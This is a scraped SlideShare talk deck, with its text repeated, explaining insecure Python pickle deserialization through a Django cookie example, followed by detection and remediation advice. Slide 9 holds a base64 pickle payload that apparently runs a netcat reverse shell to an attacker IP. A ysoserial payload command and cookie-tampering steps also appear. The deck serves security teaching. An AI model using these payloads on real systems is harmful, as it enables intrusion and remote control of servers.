SlideShare a Scribd company logo
How Eggxactly Insecure
Deserialization Exploits work
www.pavanw3b.com
@pavanw3b
The Egg Series
2
@pavanw3b
$ whoami
Pavan aka pavanw3b
Iron man fan & Marvel follower
Developer turned Bug Hunter
Manager, Product Security @ ServiceNow
Null Hyderabad core member
www.pavanw3b.com
3
@pavanw3b
A Story about Eggs
@pavanw3b
The Chick has to break out of the shell 1
@pavanw3b
1:
https://www.youtube.com/watch?v=ozMPRSZ8Ykk
● Many people in Security don’t understand 1
● Hard to find for most
● OWASP Top 10 2021 A8: Software & Data Integrity Failure
● It’s fun!
● It’s a Python day, but same in any technology
1:
Observed most candidates fail to explain clearly in the interviews
Why talk about Insecure Deserialization Weakness?
@pavanw3b
Everybody knows; nobody understands
7
@pavanw3b
What does OWASP say?
8
@pavanw3b
The magical code
gASVNwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUQxxuYyAtYyBz
aCAxOTIuMTY4LjE3LjEyOSA4ODg4lIWUUpQu
9
Base64decode
@pavanw3b
What’s serialization?
● Wikipedia: Converting an object to a format that can be
stored, transmitted and reconstructed
10
@pavanw3b
11
Bruce to Hulk: Serialization
@pavanw3b
Break it down:
Object, Stored, Transmitted
and Reconstructed.
12
@pavanw3b
Let’s look at Bruce, I mean Object
character = {“first_name”: “Bruce”, “last_name”: “Banner”}
● Dictionary in Python
● Character is an Object
● Object: Material seen, touched etc
● Object in OOP: An instance of class
● Class: A defines the characters and features
13
@pavanw3b
I thought Python dict is a data type.
Are you saying it’s a class?
The diff got thinner and now it’s the same!
More details: https://stackoverflow.com/a/35959047
14
@pavanw3b
Stored. Why?
● Manage state
● Persist as data for processing later
● Recreate objects even if the program is terminated
● Stored on Disk, Database, Caches, Socket, Message Bus etc
15
@pavanw3b
Transmitted. Why?
● Server to client - end user
● For consumption by different technology
● Two machines: Machine A wants to send rich object to Machine B
instead of plain data.
16
@pavanw3b
Reconstructed. Why?
● Server to client - end user
● Another technology needs to process
● Could be a shared, micro service
17
@pavanw3b
Why we Serialize?
● Object in one environment can’t be understood by another
● Pass data at different layers
○ Client to server
○ File-DB to business layer etc
● Micro services
● OOP & MVC influences to see everything in Object and Model.
18
@pavanw3b
python serialize.py
python deserialize.py
python client-bs.py
python server-bs.py
Base64encode for better
transmission and storage.
Example of Serialize & Deserialize
19
@pavanw3b
Python Pickle
● A python default module for serialize-deserialize
● We consider built-in modules over third-party
● Implements binary protocol
20
Unpickling
@pavanw3b
● Convert serialized data back to Objects
Pickling = Serializing, Marshalling, Flattening
● Converts Objects into Byte Stream
● dump() vs dumps(): Pickled File vs byte stream object
Now the problem is
● Not Secure
● Only unpickle data you trust
● Leads to RCE otherwise
21
@pavanw3b
Let’s take a deeper look
python serialize-to-file.py python deserialize-from-file.py
22
@pavanw3b
I can control the object. How do I RCE?
● Use the same way as Serialization
● Serialize a RCE payload and pass it to (Insecure) Deserialization
● Problem: The payload should be an Object!
● Solution: __reduce__()
● Special instruction on how to handle certain object when it fails natively.
● E.g.: Open File
23
@pavanw3b
Why __reduce__() exists: The Problem
24
@pavanw3b
Why __reduce__() exists: The Solution
25
Returns:
● Callable object that gets
initialized when expanded
● A tuple of arguments to
the object
@pavanw3b
Creating Payload
● Create Payload
● Dump into pickle file
● Deserialize insecurely
python attack.py
python deserialize-from-file.py
26
@pavanw3b
Target: Django Application
● User Form data pickled and set to Cookie
● Cookie value unpickled on the next request
● Expected base64encoded “user” cookie
● Design: Get User object from the client side
● #MVC
27
@pavanw3b
Getting Reverse Shell from the Target
● Use __reduce__ and return os.system with your RCE Payload
● Serialize it, base64encode it and print
● Edit user cookie and reload
28
@pavanw3b
Why Pickle does it this way?
● Not because pickles contain code
● Because they create objects by calling constructors named in the pickle
● Pickle Virtual Machine (PVM)
● Serialized stream is actually instructions
● Handles the Opcodes directly!
29
@pavanw3b
Common places to check for insecure deserialization
● Cookie values
● Files: User supplied, log files, panda dataframe to binary
● Social media feeds / tweets
● User controlled data gets converted into Objects
30
@pavanw3b
Watch out for in White box Code Reviews
● Python: pickle.loads(), pickle.load(), yaml.load()
● Php: unserialize()
● Java: XMLdecoder, XStream.fromXML(),
ObjectInputStream().readObject(), readObject,
readObjectNodData, readResolve, readExternal,
readUnshared, Serializable etc
31
@pavanw3b
Watch out for in Black box dynamic testing
● Python: data ends with dot (.)
● Java: AC ED 00 Hex, ro0 in base64,
Content-type: application:x-java-serialized-object
● .NET: AAEAAAD//////
32
@pavanw3b
Utilities for detection and exploitation
● frohoff/ysoserial: Java
java -jar ./ysoserial-0.0.4-all.jar CommonsCollections1 ‘ping domain.com’ > payload
● pwntester/ysoserial.net: .NET
● Burp Extension: Java Deserialization Scanner by federicodotta
33
@pavanw3b
Remediate
● Don’t spoil your Pickle: Don’t unpickle untrusted data
● Other language: Use Look Ahead along with a Whitelist of Classes
● Be careful about the whitelist: DoS - Billion laughs attack incase of Hash,
Array etc Classes
● Fix: Java 9: Serial Filters or check the depth or size
34
@pavanw3b
Design & Configurations Recommendations
● Prefer language-agnostic formats: JSON, YAML over native binary
● Sign data with hmac and check it is not tampered with
● Don’t rely on WAFs alone: They don’t have visibility to internal
● Avoid generic serialization, use class-specific serialization
35
@pavanw3b
References:
pickle — Python object serialization — Python 3.10.5 documentation
Pickling Objects in Python
BlackHat 2011 - Sour Pickles, A serialised exploitation guide in one part
Class vs. Type in Python - Stack Overflow
Deserialization - OWASP Cheat Sheet Series
36
@pavanw3b
Takeaways
Code: https://github.com/pavanw3b/insecure-django
Slides: https://tinyurl.com/nullhyd-pavanw3b-mar-23
Blog: https://darkw3b.com/insecure-deserialization-pythoin-pickle-django/
37
https://pavanw3b.com
@pavanw3b

More Related Content

Similar to How Eggxactly Insecure Deserialization Exploit works(1).pdf

[CB19] API-induced SSRF: How Apple Pay Scattered Vulnerabilities Across the W...
[CB19] API-induced SSRF: How Apple Pay Scattered Vulnerabilities Across the W...[CB19] API-induced SSRF: How Apple Pay Scattered Vulnerabilities Across the W...
[CB19] API-induced SSRF: How Apple Pay Scattered Vulnerabilities Across the W...
CODE BLUE
 
Prometheus as exposition format for eBPF programs running on Kubernetes
Prometheus as exposition format for eBPF programs running on KubernetesPrometheus as exposition format for eBPF programs running on Kubernetes
Prometheus as exposition format for eBPF programs running on Kubernetes
Leonardo Di Donato
 
When DevOps and Networking Intersect by Brent Salisbury of socketplane.io
When DevOps and Networking Intersect by Brent Salisbury of socketplane.ioWhen DevOps and Networking Intersect by Brent Salisbury of socketplane.io
When DevOps and Networking Intersect by Brent Salisbury of socketplane.io
DevOps4Networks
 
Java Hurdling: Obstacles and Techniques in Java Client Penetration-Testing
Java Hurdling: Obstacles and Techniques in Java Client Penetration-TestingJava Hurdling: Obstacles and Techniques in Java Client Penetration-Testing
Java Hurdling: Obstacles and Techniques in Java Client Penetration-Testing
Tal Melamed
 
H2O for IoT - Jo-Fai (Joe) Chow, H2O
H2O for IoT - Jo-Fai (Joe) Chow, H2OH2O for IoT - Jo-Fai (Joe) Chow, H2O
H2O for IoT - Jo-Fai (Joe) Chow, H2O
Data Science Milan
 
Fuzzing - Part 2
Fuzzing - Part 2Fuzzing - Part 2
Fuzzing - Part 2
UTD Computer Security Group
 
Monitoring Big Data Systems Done "The Simple Way" - Demi Ben-Ari - Codemotion...
Monitoring Big Data Systems Done "The Simple Way" - Demi Ben-Ari - Codemotion...Monitoring Big Data Systems Done "The Simple Way" - Demi Ben-Ari - Codemotion...
Monitoring Big Data Systems Done "The Simple Way" - Demi Ben-Ari - Codemotion...
Codemotion
 
Monitoring Big Data Systems "Done the simple way" - Demi Ben-Ari - Codemotion...
Monitoring Big Data Systems "Done the simple way" - Demi Ben-Ari - Codemotion...Monitoring Big Data Systems "Done the simple way" - Demi Ben-Ari - Codemotion...
Monitoring Big Data Systems "Done the simple way" - Demi Ben-Ari - Codemotion...
Demi Ben-Ari
 
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Berlin 2017
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Berlin 2017Monitoring Big Data Systems Done "The Simple Way" - Codemotion Berlin 2017
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Berlin 2017
Demi Ben-Ari
 
H2O at Poznan R Meetup
H2O at Poznan R MeetupH2O at Poznan R Meetup
H2O at Poznan R Meetup
Jo-fai Chow
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
bugcrowd
 
What Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data ExfiltrationWhat Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data Exfiltration
CTruncer
 
Kubernetes: Learning from Zero to Production
Kubernetes: Learning from Zero to ProductionKubernetes: Learning from Zero to Production
Kubernetes: Learning from Zero to Production
Rosemary Wang
 
Machine Learning for (DF)IR with Velociraptor: From Setting Expectations to a...
Machine Learning for (DF)IR with Velociraptor: From Setting Expectations to a...Machine Learning for (DF)IR with Velociraptor: From Setting Expectations to a...
Machine Learning for (DF)IR with Velociraptor: From Setting Expectations to a...
Chris Hammerschmidt
 
Tuga it 2017 - Event processing with Apache Storm
Tuga it 2017 - Event processing with Apache StormTuga it 2017 - Event processing with Apache Storm
Tuga it 2017 - Event processing with Apache Storm
Nuno Caneco
 
BOX of Illusion MOSEC'17
BOX of Illusion MOSEC'17BOX of Illusion MOSEC'17
BOX of Illusion MOSEC'17
Python0x0
 
"The working architecture of NodeJs applications" Viktor Turskyi
"The working architecture of NodeJs applications" Viktor Turskyi"The working architecture of NodeJs applications" Viktor Turskyi
"The working architecture of NodeJs applications" Viktor Turskyi
Julia Cherniak
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
Will Schroeder
 
Python Load Testing - Pygotham 2012
Python Load Testing - Pygotham 2012Python Load Testing - Pygotham 2012
Python Load Testing - Pygotham 2012
Dan Kuebrich
 
Migration to Python 3 in Finance
Migration to Python 3 in FinanceMigration to Python 3 in Finance
Migration to Python 3 in Finance
roskakori
 

Similar to How Eggxactly Insecure Deserialization Exploit works(1).pdf (20)

[CB19] API-induced SSRF: How Apple Pay Scattered Vulnerabilities Across the W...
[CB19] API-induced SSRF: How Apple Pay Scattered Vulnerabilities Across the W...[CB19] API-induced SSRF: How Apple Pay Scattered Vulnerabilities Across the W...
[CB19] API-induced SSRF: How Apple Pay Scattered Vulnerabilities Across the W...
 
Prometheus as exposition format for eBPF programs running on Kubernetes
Prometheus as exposition format for eBPF programs running on KubernetesPrometheus as exposition format for eBPF programs running on Kubernetes
Prometheus as exposition format for eBPF programs running on Kubernetes
 
When DevOps and Networking Intersect by Brent Salisbury of socketplane.io
When DevOps and Networking Intersect by Brent Salisbury of socketplane.ioWhen DevOps and Networking Intersect by Brent Salisbury of socketplane.io
When DevOps and Networking Intersect by Brent Salisbury of socketplane.io
 
Java Hurdling: Obstacles and Techniques in Java Client Penetration-Testing
Java Hurdling: Obstacles and Techniques in Java Client Penetration-TestingJava Hurdling: Obstacles and Techniques in Java Client Penetration-Testing
Java Hurdling: Obstacles and Techniques in Java Client Penetration-Testing
 
H2O for IoT - Jo-Fai (Joe) Chow, H2O
H2O for IoT - Jo-Fai (Joe) Chow, H2OH2O for IoT - Jo-Fai (Joe) Chow, H2O
H2O for IoT - Jo-Fai (Joe) Chow, H2O
 
Fuzzing - Part 2
Fuzzing - Part 2Fuzzing - Part 2
Fuzzing - Part 2
 
Monitoring Big Data Systems Done "The Simple Way" - Demi Ben-Ari - Codemotion...
Monitoring Big Data Systems Done "The Simple Way" - Demi Ben-Ari - Codemotion...Monitoring Big Data Systems Done "The Simple Way" - Demi Ben-Ari - Codemotion...
Monitoring Big Data Systems Done "The Simple Way" - Demi Ben-Ari - Codemotion...
 
Monitoring Big Data Systems "Done the simple way" - Demi Ben-Ari - Codemotion...
Monitoring Big Data Systems "Done the simple way" - Demi Ben-Ari - Codemotion...Monitoring Big Data Systems "Done the simple way" - Demi Ben-Ari - Codemotion...
Monitoring Big Data Systems "Done the simple way" - Demi Ben-Ari - Codemotion...
 
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Berlin 2017
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Berlin 2017Monitoring Big Data Systems Done "The Simple Way" - Codemotion Berlin 2017
Monitoring Big Data Systems Done "The Simple Way" - Codemotion Berlin 2017
 
H2O at Poznan R Meetup
H2O at Poznan R MeetupH2O at Poznan R Meetup
H2O at Poznan R Meetup
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
 
What Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data ExfiltrationWhat Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data Exfiltration
 
Kubernetes: Learning from Zero to Production
Kubernetes: Learning from Zero to ProductionKubernetes: Learning from Zero to Production
Kubernetes: Learning from Zero to Production
 
Machine Learning for (DF)IR with Velociraptor: From Setting Expectations to a...
Machine Learning for (DF)IR with Velociraptor: From Setting Expectations to a...Machine Learning for (DF)IR with Velociraptor: From Setting Expectations to a...
Machine Learning for (DF)IR with Velociraptor: From Setting Expectations to a...
 
Tuga it 2017 - Event processing with Apache Storm
Tuga it 2017 - Event processing with Apache StormTuga it 2017 - Event processing with Apache Storm
Tuga it 2017 - Event processing with Apache Storm
 
BOX of Illusion MOSEC'17
BOX of Illusion MOSEC'17BOX of Illusion MOSEC'17
BOX of Illusion MOSEC'17
 
"The working architecture of NodeJs applications" Viktor Turskyi
"The working architecture of NodeJs applications" Viktor Turskyi"The working architecture of NodeJs applications" Viktor Turskyi
"The working architecture of NodeJs applications" Viktor Turskyi
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
 
Python Load Testing - Pygotham 2012
Python Load Testing - Pygotham 2012Python Load Testing - Pygotham 2012
Python Load Testing - Pygotham 2012
 
Migration to Python 3 in Finance
Migration to Python 3 in FinanceMigration to Python 3 in Finance
Migration to Python 3 in Finance
 

Recently uploaded

UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
Assure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyesAssure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.
ViralQR
 
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
UiPathCommunity
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
DianaGray10
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Aggregage
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
Alison B. Lowndes
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
KatiaHIMEUR1
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 

Recently uploaded (20)

UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
Assure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyesAssure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyes
 
Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.
 
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 

How Eggxactly Insecure Deserialization Exploit works(1).pdf

  • 1. How Eggxactly Insecure Deserialization Exploits work www.pavanw3b.com @pavanw3b The Egg Series
  • 3. $ whoami Pavan aka pavanw3b Iron man fan & Marvel follower Developer turned Bug Hunter Manager, Product Security @ ServiceNow Null Hyderabad core member www.pavanw3b.com 3 @pavanw3b
  • 4. A Story about Eggs @pavanw3b
  • 5. The Chick has to break out of the shell 1 @pavanw3b 1: https://www.youtube.com/watch?v=ozMPRSZ8Ykk
  • 6. ● Many people in Security don’t understand 1 ● Hard to find for most ● OWASP Top 10 2021 A8: Software & Data Integrity Failure ● It’s fun! ● It’s a Python day, but same in any technology 1: Observed most candidates fail to explain clearly in the interviews Why talk about Insecure Deserialization Weakness? @pavanw3b
  • 7. Everybody knows; nobody understands 7 @pavanw3b
  • 8. What does OWASP say? 8 @pavanw3b
  • 10. What’s serialization? ● Wikipedia: Converting an object to a format that can be stored, transmitted and reconstructed 10 @pavanw3b
  • 11. 11 Bruce to Hulk: Serialization @pavanw3b
  • 12. Break it down: Object, Stored, Transmitted and Reconstructed. 12 @pavanw3b
  • 13. Let’s look at Bruce, I mean Object character = {“first_name”: “Bruce”, “last_name”: “Banner”} ● Dictionary in Python ● Character is an Object ● Object: Material seen, touched etc ● Object in OOP: An instance of class ● Class: A defines the characters and features 13 @pavanw3b
  • 14. I thought Python dict is a data type. Are you saying it’s a class? The diff got thinner and now it’s the same! More details: https://stackoverflow.com/a/35959047 14 @pavanw3b
  • 15. Stored. Why? ● Manage state ● Persist as data for processing later ● Recreate objects even if the program is terminated ● Stored on Disk, Database, Caches, Socket, Message Bus etc 15 @pavanw3b
  • 16. Transmitted. Why? ● Server to client - end user ● For consumption by different technology ● Two machines: Machine A wants to send rich object to Machine B instead of plain data. 16 @pavanw3b
  • 17. Reconstructed. Why? ● Server to client - end user ● Another technology needs to process ● Could be a shared, micro service 17 @pavanw3b
  • 18. Why we Serialize? ● Object in one environment can’t be understood by another ● Pass data at different layers ○ Client to server ○ File-DB to business layer etc ● Micro services ● OOP & MVC influences to see everything in Object and Model. 18 @pavanw3b
  • 19. python serialize.py python deserialize.py python client-bs.py python server-bs.py Base64encode for better transmission and storage. Example of Serialize & Deserialize 19 @pavanw3b
  • 20. Python Pickle ● A python default module for serialize-deserialize ● We consider built-in modules over third-party ● Implements binary protocol 20 Unpickling @pavanw3b ● Convert serialized data back to Objects Pickling = Serializing, Marshalling, Flattening ● Converts Objects into Byte Stream ● dump() vs dumps(): Pickled File vs byte stream object
  • 21. Now the problem is ● Not Secure ● Only unpickle data you trust ● Leads to RCE otherwise 21 @pavanw3b
  • 22. Let’s take a deeper look python serialize-to-file.py python deserialize-from-file.py 22 @pavanw3b
  • 23. I can control the object. How do I RCE? ● Use the same way as Serialization ● Serialize a RCE payload and pass it to (Insecure) Deserialization ● Problem: The payload should be an Object! ● Solution: __reduce__() ● Special instruction on how to handle certain object when it fails natively. ● E.g.: Open File 23 @pavanw3b
  • 24. Why __reduce__() exists: The Problem 24 @pavanw3b
  • 25. Why __reduce__() exists: The Solution 25 Returns: ● Callable object that gets initialized when expanded ● A tuple of arguments to the object @pavanw3b
  • 26. Creating Payload ● Create Payload ● Dump into pickle file ● Deserialize insecurely python attack.py python deserialize-from-file.py 26 @pavanw3b
  • 27. Target: Django Application ● User Form data pickled and set to Cookie ● Cookie value unpickled on the next request ● Expected base64encoded “user” cookie ● Design: Get User object from the client side ● #MVC 27 @pavanw3b
  • 28. Getting Reverse Shell from the Target ● Use __reduce__ and return os.system with your RCE Payload ● Serialize it, base64encode it and print ● Edit user cookie and reload 28 @pavanw3b
  • 29. Why Pickle does it this way? ● Not because pickles contain code ● Because they create objects by calling constructors named in the pickle ● Pickle Virtual Machine (PVM) ● Serialized stream is actually instructions ● Handles the Opcodes directly! 29 @pavanw3b
  • 30. Common places to check for insecure deserialization ● Cookie values ● Files: User supplied, log files, panda dataframe to binary ● Social media feeds / tweets ● User controlled data gets converted into Objects 30 @pavanw3b
  • 31. Watch out for in White box Code Reviews ● Python: pickle.loads(), pickle.load(), yaml.load() ● Php: unserialize() ● Java: XMLdecoder, XStream.fromXML(), ObjectInputStream().readObject(), readObject, readObjectNodData, readResolve, readExternal, readUnshared, Serializable etc 31 @pavanw3b
  • 32. Watch out for in Black box dynamic testing ● Python: data ends with dot (.) ● Java: AC ED 00 Hex, ro0 in base64, Content-type: application:x-java-serialized-object ● .NET: AAEAAAD////// 32 @pavanw3b
  • 33. Utilities for detection and exploitation ● frohoff/ysoserial: Java java -jar ./ysoserial-0.0.4-all.jar CommonsCollections1 ‘ping domain.com’ > payload ● pwntester/ysoserial.net: .NET ● Burp Extension: Java Deserialization Scanner by federicodotta 33 @pavanw3b
  • 34. Remediate ● Don’t spoil your Pickle: Don’t unpickle untrusted data ● Other language: Use Look Ahead along with a Whitelist of Classes ● Be careful about the whitelist: DoS - Billion laughs attack incase of Hash, Array etc Classes ● Fix: Java 9: Serial Filters or check the depth or size 34 @pavanw3b
  • 35. Design & Configurations Recommendations ● Prefer language-agnostic formats: JSON, YAML over native binary ● Sign data with hmac and check it is not tampered with ● Don’t rely on WAFs alone: They don’t have visibility to internal ● Avoid generic serialization, use class-specific serialization 35 @pavanw3b
  • 36. References: pickle — Python object serialization — Python 3.10.5 documentation Pickling Objects in Python BlackHat 2011 - Sour Pickles, A serialised exploitation guide in one part Class vs. Type in Python - Stack Overflow Deserialization - OWASP Cheat Sheet Series 36 @pavanw3b
  • 37. Takeaways Code: https://github.com/pavanw3b/insecure-django Slides: https://tinyurl.com/nullhyd-pavanw3b-mar-23 Blog: https://darkw3b.com/insecure-deserialization-pythoin-pickle-django/ 37 https://pavanw3b.com @pavanw3b